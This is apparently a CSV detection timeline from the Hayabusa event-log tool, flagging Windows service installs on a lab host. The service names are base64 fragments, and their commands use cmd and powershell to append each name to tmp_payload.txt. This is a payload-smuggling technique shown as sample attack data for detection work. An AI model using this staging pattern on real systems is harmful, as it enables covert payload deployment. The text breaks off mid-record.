2021-11-03 17:18:12.786 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: dGVtRXZlbnRMb2dTaXplID0gJFN5c3RlbUluZm8uTG9nU2l6ZQ0KDQoNCiAgICAgICAgICAgICRUb3RhbEVQUyA9IFttYXRoXTo6Um91bmQoKCRBcHBsaWNhdGlvbkVQUyArICRTZWN1cml0eUVQUy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 
""seg123"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:12.786 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dGVtRXZlbnRMb2dTaXplID0gJFN5c3RlbUluZm8uTG9nU2l6ZQ0KDQoNCiAgICAgICAgICAgICRUb3RhbEVQUyA9IFttYXRoXTo6Um91bmQoKCRBcHBsaWNhdGlvbkVQUyArICRTZWN1cml0eUVQUy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg123"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:12.786 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dGVtRXZlbnRMb2dTaXplID0gJFN5c3RlbUluZm8uTG9nU2l6ZQ0KDQoNCiAgICAgICAgICAgICRUb3RhbEVQUyA9IFttYXRoXTo6Um91bmQoKCRBcHBsaWNhdGlvbkVQUyArICRTZWN1cml0eUVQUy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg123"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:14.233 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ArICRTeXN0ZW1FUFMpLCA1KQ0KICAgICAgICAgICAgJFByb2ZpbGVTdWdnZXN0aW9uID0gR2V0LVByb2ZpbGVTdWdnZXN0aW9uICRUb3RhbEVQUw0KICAgICAgICAgICAgIyRDb21wdXRlck9TID0g | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg124"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:14.233 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ArICRTeXN0ZW1FUFMpLCA1KQ0KICAgICAgICAgICAgJFByb2ZpbGVTdWdnZXN0aW9uID0gR2V0LVByb2ZpbGVTdWdnZXN0aW9uICRUb3RhbEVQUw0KICAgICAgICAgICAgIyRDb21wdXRlck9TID0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg124"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:14.233 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ArICRTeXN0ZW1FUFMpLCA1KQ0KICAgICAgICAgICAgJFByb2ZpbGVTdWdnZXN0aW9uID0gR2V0LVByb2ZpbGVTdWdnZXN0aW9uICRUb3RhbEVQUw0KICAgICAgICAgICAgIyRDb21wdXRlck9TID0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg124"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:15.677 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 
KEdldC1BRENvbXB1dGVyIC1GaWx0ZXIgKikuT3BlcmF0aW5nU3lzdGVtDQogICAgICAgICAgICAkQ29tcHV0ZXJPUyA9ICIkT1MiDQoNCg0KICAgICAgICAgICAgJEJveCA9IEB7IlByb2ZpbGVTdW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg125"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:15.677 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: KEdldC1BRENvbXB1dGVyIC1GaWx0ZXIgKikuT3BlcmF0aW5nU3lzdGVtDQogICAgICAgICAgICAkQ29tcHV0ZXJPUyA9ICIkT1MiDQoNCg0KICAgICAgICAgICAgJEJveCA9IEB7IlByb2ZpbGVTdW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg125"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:15.677 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: KEdldC1BRENvbXB1dGVyIC1GaWx0ZXIgKikuT3BlcmF0aW5nU3lzdGVtDQogICAgICAgICAgICAkQ29tcHV0ZXJPUyA9ICIkT1MiDQoNCg0KICAgICAgICAgICAgJEJveCA9IEB7IlByb2ZpbGVTdW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg125"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:17.117 
+09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: dnZXN0aW9uIiA9ICRQcm9maWxlU3VnZ2VzdGlvbjsgIlRvdGFsRVBTIiA9ICRUb3RhbEVQUzsgIk9TVmVyc2lvbiIgPSAkQ29tcHV0ZXJPUzsNCiAgICAgICAgICAgICAgICAgICAgICJBcHBsaWNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg126"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:17.117 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dnZXN0aW9uIiA9ICRQcm9maWxlU3VnZ2VzdGlvbjsgIlRvdGFsRVBTIiA9ICRUb3RhbEVQUzsgIk9TVmVyc2lvbiIgPSAkQ29tcHV0ZXJPUzsNCiAgICAgICAgICAgICAgICAgICAgICJBcHBsaWNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg126"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:17.117 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dnZXN0aW9uIiA9ICRQcm9maWxlU3VnZ2VzdGlvbjsgIlRvdGFsRVBTIiA9ICRUb3RhbEVQUzsgIk9TVmVyc2lvbiIgPSAkQ29tcHV0ZXJPUzsNCiAgICAgICAgICAgICAgICAgICAgICJBcHBsaWNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg126"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" 2021-11-03 17:18:19.634 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: A9ICRBcHBsaWNhdGlvbkxhc3RFdmVudFRpbWU7ICJBcHBsaWNhdGlvblRvdGFsRXZlbnRzIiA9ICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzOyAiQXBwbGljYXRpb25FdmVudExvZ1NpemUiID0gJEFw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg128"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:19.634 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: A9ICRBcHBsaWNhdGlvbkxhc3RFdmVudFRpbWU7ICJBcHBsaWNhdGlvblRvdGFsRXZlbnRzIiA9ICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzOyAiQXBwbGljYXRpb25FdmVudExvZ1NpemUiID0gJEFw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg128"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:19.634 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: A9ICRBcHBsaWNhdGlvbkxhc3RFdmVudFRpbWU7ICJBcHBsaWNhdGlvblRvdGFsRXZlbnRzIiA9ICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzOyAiQXBwbGljYXRpb25FdmVudExvZ1NpemUiID0gJEFw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg128"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:21.088 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: cGxpY2F0aW9uRXZlbnRMb2dTaXplOw0KICAgICAgICAgICAgICAgICAgICAgIlNlY3VyaXR5RVBTIiA9ICRTZWN1cml0eUVQUzsgIlNlY3VyaXR5Rmlyc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5Rm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg129"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:21.088 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cGxpY2F0aW9uRXZlbnRMb2dTaXplOw0KICAgICAgICAgICAgICAgICAgICAgIlNlY3VyaXR5RVBTIiA9ICRTZWN1cml0eUVQUzsgIlNlY3VyaXR5Rmlyc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5Rm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg129"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:21.088 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cGxpY2F0aW9uRXZlbnRMb2dTaXplOw0KICAgICAgICAgICAgICAgICAgICAgIlNlY3VyaXR5RVBTIiA9ICRTZWN1cml0eUVQUzsgIlNlY3VyaXR5Rmlyc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5Rm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 
""seg129"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:22.542 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: lyc3RFdmVudFRpbWU7ICJTZWN1cml0eUxhc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5TGFzdEV2ZW50VGltZTsgIlNlY3VyaXR5VG90YWxFdmVudHMiID0gJFNlY3VyaXR5VG90YWxFdmVudHM7ICJT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg130"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:22.542 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: lyc3RFdmVudFRpbWU7ICJTZWN1cml0eUxhc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5TGFzdEV2ZW50VGltZTsgIlNlY3VyaXR5VG90YWxFdmVudHMiID0gJFNlY3VyaXR5VG90YWxFdmVudHM7ICJT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg130"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:22.542 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: lyc3RFdmVudFRpbWU7ICJTZWN1cml0eUxhc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5TGFzdEV2ZW50VGltZTsgIlNlY3VyaXR5VG90YWxFdmVudHMiID0gJFNlY3VyaXR5VG90YWxFdmVudHM7ICJT | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg130"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:23.979 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ZWN1cml0eUV2ZW50TG9nU2l6ZSIgPSAkU2VjdXJpdHlFdmVudExvZ1NpemU7IA0KICAgICAgICAgICAgICAgICAgICAgIlN5c3RlbUVQUyIgPSAkU3lzdGVtRVBTOyAiU3lzdGVtRmlyc3RFdmVudF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg131"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:23.979 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZWN1cml0eUV2ZW50TG9nU2l6ZSIgPSAkU2VjdXJpdHlFdmVudExvZ1NpemU7IA0KICAgICAgICAgICAgICAgICAgICAgIlN5c3RlbUVQUyIgPSAkU3lzdGVtRVBTOyAiU3lzdGVtRmlyc3RFdmVudF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg131"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:23.979 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 
ZWN1cml0eUV2ZW50TG9nU2l6ZSIgPSAkU2VjdXJpdHlFdmVudExvZ1NpemU7IA0KICAgICAgICAgICAgICAgICAgICAgIlN5c3RlbUVQUyIgPSAkU3lzdGVtRVBTOyAiU3lzdGVtRmlyc3RFdmVudF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg131"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:25.446 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: RpbWUiID0gJFN5c3RlbUZpcnN0RXZlbnRUaW1lOyAiU3lzdGVtTGFzdEV2ZW50VGltZSIgPSAkU3lzdGVtTGFzdEV2ZW50VGltZTsgIlN5c3RlbVRvdGFsRXZlbnRzIiA9ICRTeXN0ZW1Ub3RhbEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg132"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:25.446 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RpbWUiID0gJFN5c3RlbUZpcnN0RXZlbnRUaW1lOyAiU3lzdGVtTGFzdEV2ZW50VGltZSIgPSAkU3lzdGVtTGFzdEV2ZW50VGltZTsgIlN5c3RlbVRvdGFsRXZlbnRzIiA9ICRTeXN0ZW1Ub3RhbEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg132"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:25.446 
+09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RpbWUiID0gJFN5c3RlbUZpcnN0RXZlbnRUaW1lOyAiU3lzdGVtTGFzdEV2ZW50VGltZSIgPSAkU3lzdGVtTGFzdEV2ZW50VGltZTsgIlN5c3RlbVRvdGFsRXZlbnRzIiA9ICRTeXN0ZW1Ub3RhbEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg132"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:26.912 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ZW50czsgIlN5c3RlbUV2ZW50TG9nU2l6ZSIgPSAkU3lzdGVtRXZlbnRMb2dTaXplO30NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJFJlcG9ydC5BZGQoJENvbXB1dGVyLCAkQm94KSAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg133"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:26.912 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZW50czsgIlN5c3RlbUV2ZW50TG9nU2l6ZSIgPSAkU3lzdGVtRXZlbnRMb2dTaXplO30NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJFJlcG9ydC5BZGQoJENvbXB1dGVyLCAkQm94KSAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg133"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" 2021-11-03 17:18:26.912 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZW50czsgIlN5c3RlbUV2ZW50TG9nU2l6ZSIgPSAkU3lzdGVtRXZlbnRMb2dTaXplO30NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJFJlcG9ydC5BZGQoJENvbXB1dGVyLCAkQm94KSAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg133"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:28.373 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICAgICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICRQZXJjZW50Q29tcGxldGUgPSAkUHJvZ3Jlc3NDb3VudCAvICRDb21wdXRlckNvdW50ICogMTAwDQogICAgICAgICAgICAkUGVyY2Vu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg134"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:28.373 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICRQZXJjZW50Q29tcGxldGUgPSAkUHJvZ3Jlc3NDb3VudCAvICRDb21wdXRlckNvdW50ICogMTAwDQogICAgICAgICAgICAkUGVyY2Vu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg134"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:28.373 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICRQZXJjZW50Q29tcGxldGUgPSAkUHJvZ3Jlc3NDb3VudCAvICRDb21wdXRlckNvdW50ICogMTAwDQogICAgICAgICAgICAkUGVyY2Vu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg134"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:29.844 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: dENvbXBsZXRlID0gW21hdGhdOjpSb3VuZCgkUGVyY2VudENvbXBsZXRlLCAwKQ0KDQogICAgICAgICAgICBXcml0ZS1Qcm9ncmVzcyAtQWN0aXZpdHkgIlByb2Nlc3NpbmcgQ29tcHV0ZXIgTGlzdC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg135"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:29.844 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dENvbXBsZXRlID0gW21hdGhdOjpSb3VuZCgkUGVyY2VudENvbXBsZXRlLCAwKQ0KDQogICAgICAgICAgICBXcml0ZS1Qcm9ncmVzcyAtQWN0aXZpdHkgIlByb2Nlc3NpbmcgQ29tcHV0ZXIgTGlzdC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg135"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:29.844 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dENvbXBsZXRlID0gW21hdGhdOjpSb3VuZCgkUGVyY2VudENvbXBsZXRlLCAwKQ0KDQogICAgICAgICAgICBXcml0ZS1Qcm9ncmVzcyAtQWN0aXZpdHkgIlByb2Nlc3NpbmcgQ29tcHV0ZXIgTGlzdC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg135"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:31.297 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AtICAkUGVyY2VudENvbXBsZXRlJSBDb21wbGV0ZSIgLXN0YXR1cyAiQ2FsY3VsYXRpbmcgRVBTIGZvciBDb21wdXRlcjogJENvbXB1dGVyIiAtcGVyY2VudENvbXBsZXRlICRQZXJjZW50Q29tcGxl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg136"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 